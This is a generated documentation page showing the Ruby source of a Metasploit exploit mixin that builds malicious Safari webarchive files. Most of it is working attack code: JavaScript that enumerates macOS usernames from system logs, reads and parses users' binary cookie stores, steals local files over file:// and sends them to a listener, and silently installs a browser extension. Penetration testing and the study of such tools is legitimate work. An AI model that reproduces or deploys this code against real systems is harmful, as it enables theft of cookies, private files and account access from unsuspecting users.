<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="install_extension-instance_method">
#<strong>install_extension</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 104</span>
<span class='kw'>def</span> <span class='id identifier rubyid_install_extension'>install_extension</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span> <span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>INSTALL_EXTENSION</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EXTENSION_URL datastore option missing</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXTENSION_URL</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_present?'>present?</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EXTENSION_ID datastore option missing</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXTENSION_ID</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_present?'>present?</span>
<span class='id identifier rubyid_wrap_with_script'>wrap_with_script</span> <span class='kw'>do</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
var qq = null;
var extURL = atob(&#39;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXTENSION_URL</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;);
var extID = atob(&#39;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXTENSION_ID</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;);
function go(){
window.focus();
qq.open(&#39;javascript:safari&amp;&amp;(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&amp;&amp;window.top.location.reload(false)))&amp;&amp;(safari.installExtension(&quot;&#39;+extID+&#39;&quot;, &quot;&#39;+extURL+&#39;&quot;), window.close());&#39;, &#39;_self&#39;);
}
window.addEventListener(&#39;message&#39;, function(e) {
if (!qq &amp;&amp; e.data === &#39;EXT&#39;) {
qq = e.source;
setInterval(go, 600);
}
});
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="message-instance_method">
#<strong>message</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns HTML content that is rendered in the &lt;body&gt; of the webarchive.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>HTML content that is rendered in the &lt;body&gt; of the webarchive.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
341
342
343</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 341</span>
<span class='kw'>def</span> <span class='id identifier rubyid_message'>message</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;p&gt;You are being redirected.&lt;/p&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="should_steal_files?-instance_method">
#<strong>should_steal_files?</strong> &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
358
359
360</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 358</span>
<span class='kw'>def</span> <span class='id identifier rubyid_should_steal_files?'>should_steal_files?</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>STEAL_FILES</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="steal_default_files-instance_method">
#<strong>steal_default_files</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 162</span>
<span class='kw'>def</span> <span class='id identifier rubyid_steal_default_files'>steal_default_files</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
try {
function xhr(url, cb, responseType) {
var x = new XMLHttpRequest;
x.onload = function() { cb(x) }
x.open(&#39;GET&#39;, url);
if (responseType) x.responseType = responseType;
x.send();
}
var files = [&#39;/var/log/monthly.out&#39;, &#39;/var/log/appstore.log&#39;, &#39;/var/log/install.log&#39;];
var done = 0;
var _u = {};
var cookies = [];
files.forEach(function(f) {
xhr(f, function(x) {
var m;
var users = [];
var pattern = /\\/Users\\/([^\\s^\\/^&quot;]+)/g;
while ((m = pattern.exec(x.responseText)) !== null) {
if(!_u[m[1]]) { users.push(m[1]); }
_u[m[1]] = 1;
}
if (users.length) { next(users); }
});
});
var id=0;
function next(users) {
// now lets steal all the data we can!
sendData(&#39;usernames&#39;+id, users);
id++;
users.forEach(function(user) {
if (</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>STEAL_COOKIES</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>) {
xhr(&#39;file:///Users/&#39;+encodeURIComponent(user)+&#39;/Library/Cookies/Cookies.binarycookies&#39;, function(x) {
parseBinaryFile(x.response);
}, &#39;arraybuffer&#39;);
}
if (</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>STEAL_FILES</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>) {
var files = &#39;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_default_files'>default_files</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;;
atob(files).split(/\\s+/).forEach(function(file) {
file = file.replace(&#39;$USER&#39;, encodeURIComponent(user));
xhr(file, function(x) {
sendData(file.replace(&#39;file://&#39;, &#39;&#39;), x.responseText);
});
});
}
});
}
function parseBinaryFile(buffer) {
var data = new DataView(buffer);
// check for MAGIC &#39;cook&#39; in big endian
if (data.getUint32(0, false) != 1668247403)
throw new Error(&#39;Invalid magic at top of cookie file.&#39;)
// big endian length in next 4 bytes
var numPages = data.getUint32(4, false);
var pageSizes = [], cursor = 8;
for (var i = 0; i &lt; numPages; i++) {
pageSizes.push(data.getUint32(cursor, false));
cursor += 4;
}
pageSizes.forEach(function(size) {
parsePage(buffer.slice(cursor, cursor + size));
cursor += size;
});
reportStolenCookies();
}
function parsePage(buffer) {
var data = new DataView(buffer);
if (data.getUint32(0, false) != 256) {
return; // invalid magic in page header
}
var numCookies = data.getUint32(4, true);
var offsets = [];
for (var i = 0; i &lt; numCookies; i++) {
offsets.push(data.getUint32(8+i*4, true));
}
offsets.forEach(function(offset, idx) {
var next = offsets[idx+1] \|\| buffer.byteLength - 4;
try{parseCookie(buffer.slice(offset, next));}catch(e){};
});
}
function read(data, offset) {
var str = &#39;&#39;, c = null;
try {
while ((c = data.getUint8(offset++)) != 0) {
str += String.fromCharCode(c);
}
} catch(e) {};
return str;
}
function parseCookie(buffer) {
var data = new DataView(buffer);
var size = data.getUint32(0, true);
var flags = data.getUint32(8, true);
var urlOffset = data.getUint32(16, true);
var nameOffset = data.getUint32(20, true);
var pathOffset = data.getUint32(24, true);
var valueOffset = data.getUint32(28, true);
var result = {
value: read(data, valueOffset),
path: read(data, pathOffset),
url: read(data, urlOffset),
name: read(data, nameOffset),
isSecure: flags &amp; 1,
httpOnly: flags &amp; 4
};
cookies.push(result);
}
function reportStolenCookies() {
if (cookies.length &gt; 0) {
sendData(&#39;cookieDump&#39;, cookies);
}
}
} catch (e) { console.log(&#39;ERROR: &#39;+e.message); }
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="steal_files-instance_method">
#<strong>steal_files</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns javascript code, wrapped in a script tag, that steals local files and sends them back to the listener. This code is executed in the WebMainResource (parent) frame, which runs in the file:// protocol.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>javascript code, wrapped in a script tag, that steals local files and sends them back to the listener. This code is executed in the WebMainResource (parent) frame, which runs in the file:// protocol</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 131</span>
<span class='kw'>def</span> <span class='id identifier rubyid_steal_files'>steal_files</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span> <span class='kw'>unless</span> <span class='id identifier rubyid_should_steal_files?'>should_steal_files?</span>
<span class='id identifier rubyid_urls_str'>urls_str</span> <span class='op'>=</span> <span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>FILE_URLS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='rparen'>)</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_reject'>reject</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_s'>s</span><span class='op'>|</span> <span class='op'>!</span><span class='id identifier rubyid_s'>s</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>$USER</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_join'><span class='object_link'><a href="../../../top-level-namespace.html#join-instance_method" title="#join (method)">join</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_wrap_with_script'>wrap_with_script</span> <span class='kw'>do</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
var filesStr = &quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_urls_str'>urls_str</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;
var files = filesStr.trim().split(/\s+/);
function stealFile(url) {
var req = new XMLHttpRequest();
var sent = false;
req.open(&#39;GET&#39;, url, true);
req.onreadystatechange = function() {
if (!sent &amp;&amp; req.responseText &amp;&amp; req.responseText.length &gt; 0) {
sendData(url, req.responseText);
sent = true;
}
};
req.send(null);
};
files.forEach(stealFile);
</span><span class='tstring_end'>|</span></span> <span class='op'>+</span> <span class='id identifier rubyid_steal_default_files'>steal_default_files</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="urls-instance_method">
#<strong>urls</strong> &#x21d2; <tt>Array&lt;String&gt;</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns of URLs provided by the user.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array&lt;String&gt;</tt>)</span>
&mdash;
<div class='inline'>
<p>of URLs provided by the user</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
346
347
348</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 346</span>
<span class='kw'>def</span> <span class='id identifier rubyid_urls'>urls</span>
<span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URLS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="webarchive_download_url-instance_method">
#<strong>webarchive_download_url</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns URL that serves the malicious webarchive.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>URL that serves the malicious webarchive</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
336
337
338</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 336</span>
<span class='kw'>def</span> <span class='id identifier rubyid_webarchive_download_url'>webarchive_download_url</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>DOWNLOAD_PATH</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="webarchive_footer-instance_method">
#<strong>webarchive_footer</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the closing chunk of the webarchive XML code.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the closing chunk of the webarchive XML code</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
65
66
67
68
69
70
71</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 65</span>
<span class='kw'>def</span> <span class='id identifier rubyid_webarchive_footer'>webarchive_footer</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
&lt;/array&gt;
&lt;/dict&gt;
&lt;/plist&gt;
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="webarchive_header-instance_method">
#<strong>webarchive_header</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the first chunk of the webarchive file, containing the WebMainResource.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the first chunk of the webarchive file, containing the WebMainResource</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 38</span>
<span class='kw'>def</span> <span class='id identifier rubyid_webarchive_header'>webarchive_header</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot;
&quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;&gt;
&lt;plist version=&quot;1.0&quot;&gt;
&lt;dict&gt;
&lt;key&gt;WebMainResource&lt;/key&gt;
&lt;dict&gt;
&lt;key&gt;WebResourceData&lt;/key&gt;
&lt;data&gt;
</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_iframes_container_html'>iframes_container_html</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/data&gt;
&lt;key&gt;WebResourceFrameName&lt;/key&gt;
&lt;string&gt;&lt;/string&gt;
&lt;key&gt;WebResourceMIMEType&lt;/key&gt;
&lt;string&gt;text/html&lt;/string&gt;
&lt;key&gt;WebResourceTextEncodingName&lt;/key&gt;
&lt;string&gt;UTF-8&lt;/string&gt;
&lt;key&gt;WebResourceURL&lt;/key&gt;
&lt;string&gt;file:///&lt;/string&gt;
&lt;/dict&gt;
&lt;key&gt;WebSubframeArchives&lt;/key&gt;
&lt;array&gt;
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="webarchive_xml-instance_method">
#<strong>webarchive_xml</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns contents of webarchive as an XML document.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>contents of webarchive as an XML document</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
30
31
32
33
34
35</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 30</span>
<span class='kw'>def</span> <span class='id identifier rubyid_webarchive_xml'>webarchive_xml</span>
<span class='kw'>return</span> <span class='ivar'>@xml</span> <span class='kw'>if</span> <span class='kw'>not</span> <span class='ivar'>@xml</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='comment'># only compute xml once
</span> <span class='ivar'>@xml</span> <span class='op'>=</span> <span class='id identifier rubyid_webarchive_header'>webarchive_header</span>
<span class='ivar'>@xml</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_webarchive_footer'>webarchive_footer</span>
<span class='ivar'>@xml</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wrap_with_doc-instance_method">
#<strong>wrap_with_doc</strong>(&amp;blk) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Wraps the result of the block in an HTML5 document and body</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
76
77
78
79
80
81
82
83
84
85</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 76</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wrap_with_doc'>wrap_with_doc</span><span class='lparen'>(</span><span class='op'>&amp;</span><span class='id identifier rubyid_blk'>blk</span><span class='rparen'>)</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
&lt;!doctype html&gt;
&lt;html&gt;
&lt;body&gt;
</span><span class='embexpr_beg'>#{</span><span class='kw'>yield</span><span class='embexpr_end'>}</span><span class='tstring_content'>
&lt;/body&gt;
&lt;/html&gt;
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wrap_with_script-instance_method">
#<strong>wrap_with_script</strong>(&amp;blk) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Wraps the result of the block with &lt;script&gt; tags</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
88
89
90</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 88</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wrap_with_script'>wrap_with_script</span><span class='lparen'>(</span><span class='op'>&amp;</span><span class='id identifier rubyid_blk'>blk</span><span class='rparen'>)</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;script&gt;</span><span class='embexpr_beg'>#{</span><span class='kw'>yield</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/script&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:01:53 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink